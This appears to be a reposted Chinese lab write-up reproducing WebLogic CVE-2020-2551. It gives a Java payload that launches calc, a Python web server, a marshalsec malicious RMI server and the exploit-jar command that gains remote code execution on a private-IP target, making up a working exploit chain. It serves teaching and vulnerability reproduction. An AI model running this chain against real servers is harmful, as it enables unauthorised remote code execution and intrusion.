Weblogic CVE-2020-2551漏洞复现


漏洞原理

http://blog.topsec.com.cn/weblogic-cve-2020-2551%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://www.cnblogs.com/-qing-/p/12682804.html

https://www.cnblogs.com/renhaoblog/p/13346294.html

环境搭建

靶机:win7 ip地址:192.168.177.129 WebLogic Server 版本: 10.3.6.0

攻击机:win10 物理机 ip地址:192.168.177.1

漏洞复现

工具使用

先使用python脚本检测漏洞:

 exp文件:

1.查看exp源代码:

import java.io.IOException;
public class exp {
    static{
        try {
            java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    public static void main(String[] args) {
        
    }
}

2.编译exp生成class

进入文件所在目录打开cmd,使用命令:javac exp.java -source 1.6 -target 1.6

3. 使用python启动web服务

进入exp目录打开cmd,使用命令启动web服务:python3 -m http.server 80

4.启动恶意RMI服务

进入目录打开cmd,开启服务命令:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.177.1/#exp" 1099

 5.使用exp攻击

使用命令加载exp攻击靶机漏洞:java -jar weblogic_CVE_2020_2551.jar 192.168.177.129 7001 rmi://192.168.177.1:1099/exp

参考链接

https://www.cnblogs.com/loong-hon/p/10619616.html
https://bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/

http://blog.topsec.com.cn/weblogic-cve-2020-2551%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://www.cnblogs.com/-qing-/p/12682804.html

https://www.cnblogs.com/renhaoblog/p/13346294.html

免责声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM